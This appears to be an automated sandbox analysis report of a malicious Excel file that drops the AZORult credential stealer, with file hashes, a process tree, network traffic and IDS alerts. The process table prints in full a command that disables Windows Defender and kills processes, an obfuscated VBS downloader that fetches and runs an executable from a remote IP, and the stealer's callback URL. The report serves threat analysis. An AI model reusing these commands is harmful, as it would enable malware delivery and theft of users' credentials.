File name: | macro1.xls |
Full analysis: | https://app.any.run/tasks/43946ffa-7076-46a6-bff2-2962bae15781 |
Verdict: | Malicious activity |
Threats: | AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. |
Analysis date: | May 15, 2019, 18:05:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Wed May 15 14:17:11 2019, Security: 0 |
MD5: | 3E899273F9F64824B4DCA6F76489F838 |
SHA1: | 920BFB6AF30274DED15008418752EE0843107254 |
SHA256: | 605D446A2E183D025F9175F8829025EEF9FF45A59F941E2B0CACC1150B754BD7 |
SSDEEP: | 768:/Sk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJhVpAZ8Tm:qk3hOdsylKlgxopeiBNhZFGzE+cL2kd0 |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | Sheet1 |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
ModifyDate: | 2019:05:15 13:17:11 |
CreateDate: | 2015:06:05 18:17:20 |
Software: | Microsoft Excel |
LastModifiedBy: | - |
Author: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3292 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 1 Version: 14.0.6024.1000 | ||||
2656 | mshta https://thisisredirectionpageonly.blogspot.com/p/adminhelpdesk.html | C:\Windows\system32\mshta.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3036 | "C:\Windows\System32\mshta.exe" http://pastebin.com/raw/A766dj3K | C:\Windows\System32\mshta.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2884 | "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c "taskkill /f /im MSASCuiL.exe" & forfiles /c "taskkill /f /im MpCmdRun.exe" & exit | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1132 | "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo AmmEiqWkls = "http://142.11.206.184/admin.exe">>UpdateWindow.vbs &@echo ZIMMER = L0u("NcN`aV[a;ReR")>>UpdateWindow.vbs &@echo Set ZIMMERing = CreateObject(L0u("Z`eZY?;eZYUaa]"))>>UpdateWindow.vbs &@echo ZIMMERing.Open L0u("TRa"), AmmEiqWkls, False>>UpdateWindow.vbs &@echo ZIMMERing.send ("")>>UpdateWindow.vbs &@echo Set FatherOFVidus = CreateObject(L0u("NQ\QO;`a_RNZ"))>>UpdateWindow.vbs &@echo FatherOFVidus.Open>>UpdateWindow.vbs &@echo FatherOFVidus.Type = 1 >>UpdateWindow.vbs &@echo FatherOFVidus.Write ZIMMERing.ResponseBody>>UpdateWindow.vbs & @echo FatherOFVidus.Position = 0 >>UpdateWindow.vbs &@echo FatherOFVidus.SaveToFile ZIMMER, 2 >>UpdateWindow.vbs &@echo FatherOFVidus.Close>>UpdateWindow.vbs &@echo function L0u(K4d) >> UpdateWindow.vbs &@echo For Dintannaa = 1 To Len(K4d) >>UpdateWindow.vbs &@echo BuEllWsWam = Mid(K4d, Dintannaa, 1) >>UpdateWindow.vbs &@echo BuEllWsWam = Chr(Asc(BuEllWsWam)- 13) >>UpdateWindow.vbs &@echo VuzEgEas = VuzEgEas + BuEllWsWam >> UpdateWindow.vbs &@echo Next >>UpdateWindow.vbs &@echo L0u = VuzEgEas >>UpdateWindow.vbs &@echo End Function >>UpdateWindow.vbs& UpdateWindow.vbs &dEl UpdateWindow.vbs & timeout 12 & AVASTINT.EXE | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
456 | MpCmdRun.exe -removedefinitions -dynamicsignatures | C:\Program Files\Windows Defender\MpCmdRun.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Malware Protection Command Line Utility Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3380 | taskkill /f /im winword.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3452 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\UpdateWindow.vbs" | C:\Windows\System32\WScript.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3772 | taskkill /f /im excel.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3756 | taskkill /f /im MSPUB.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3292 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRFAF7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3292 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF9D1D498569DAF3BD.TMP | — | |
MD5:— | SHA256:— | |||
2656 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\adminhelpdesk[1].html | html | |
MD5:1FDB2BAD76A117A74AACFFA9A98F8794 | SHA256:BC6C39659F63EA20E59573EBDCED60F71F657147A8EA2A16C38434C6477F88F5 | |||
1132 | cmd.exe | C:\Users\Public\UpdateWindow.vbs | text | |
MD5:633984774035BDC5650790CABC272E9C | SHA256:86927A17E156AED5CC6346E7CF63A5EDC4B6061D6B031FD9AB4630A7FE7C60EC | |||
3036 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\A766dj3K[1].txt | html | |
MD5:34E3E1FD1749100B1F189B7A38F7B757 | SHA256:8B482793741500DDBD6C626AE4E5FFF0DFB27D8BC4B7ABD17A8C612A5B65C5A8 | |||
3292 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF7A6630901FF40243.TMP | document | |
MD5:032162975E837EDD7E8967814C31A439 | SHA256:1AE3BE6230348A66D787D4FCBA25FB9CA6638B00B8CAA2B8274596769C1C1C97 | |||
2656 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\1961721879-ieretrofit[1].js | html | |
MD5:2EB212E3AC3425A2A6BC22B4B1EEBF9D | SHA256:432D4759E839EAA812B10829AF91CFD71217D21244E9864700A8456DDA6DDC08 | |||
456 | MpCmdRun.exe | C:\Users\admin\AppData\Local\Temp\MpCmdRun.log | text | |
MD5:D7639C499A9BDAFF9A31E0A5D3C8ABDD | SHA256:E8BA61617CFB251ECC025052F94BD819C77A8056813FC8C4F1FA90DC55DE7D68 | |||
3452 | WScript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\admin[1].exe | executable | |
MD5:22E5B3DE6AB509F7490C52FE77D9F1CE | SHA256:D64503A8EF7CC902266DC0FF286CF02145931F2CE387010EB7E81C5A178766FA | |||
3036 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | |
MD5:043F8DB45FDD58FB5309858B3D833852 | SHA256:CD453A17F7FC8948177A5A33790D989454EF050D9C79613E2E1AF5240292B967 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3452 | WScript.exe | GET | 200 | 142.11.206.184:80 | http://142.11.206.184/admin.exe | US | executable | 618 Kb | suspicious |
3036 | mshta.exe | GET | 200 | 104.20.209.21:80 | http://pastebin.com/raw/A766dj3K | US | html | 1.26 Kb | shared |
2800 | AVASTINT.EXE | POST | 200 | 194.32.79.169:80 | http://phonetechindia.tk/user2/Panel/index.php | unknown | txt | 4.27 Mb | malicious |
2800 | AVASTINT.EXE | POST | 200 | 194.32.79.169:80 | http://phonetechindia.tk/user2/Panel/index.php | unknown | text | 5 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3036 | mshta.exe | 104.20.209.21:80 | pastebin.com | Cloudflare Inc | US | shared |
2656 | mshta.exe | 216.58.207.33:443 | thisisredirectionpageonly.blogspot.com | Google Inc. | US | whitelisted |
2656 | mshta.exe | 216.58.208.41:443 | www.blogger.com | Google Inc. | US | whitelisted |
3452 | WScript.exe | 142.11.206.184:80 | — | Hostwinds LLC. | US | suspicious |
2800 | AVASTINT.EXE | 194.32.79.169:80 | phonetechindia.tk | — | — | suspicious |
Domain | IP | Reputation |
---|---|---|
thisisredirectionpageonly.blogspot.com |
| whitelisted |
www.blogger.com |
| shared |
resources.blogblog.com |
| whitelisted |
pastebin.com |
| shared |
phonetechindia.tk |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3036 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
3452 | WScript.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
3452 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 |
3452 | WScript.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3452 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 |
3452 | WScript.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
2800 | AVASTINT.EXE | A Network Trojan was detected | ET TROJAN AZORult Variant.4 Checkin M2 |
2800 | AVASTINT.EXE | A Network Trojan was detected | MALWARE [PTsecurity] AZORult client request |
2800 | AVASTINT.EXE | A Network Trojan was detected | MALWARE [PTsecurity] AZORult.Stealer HTTP Header |
2800 | AVASTINT.EXE | Potentially Bad Traffic | ET POLICY HTTP Request to a *.tk domain |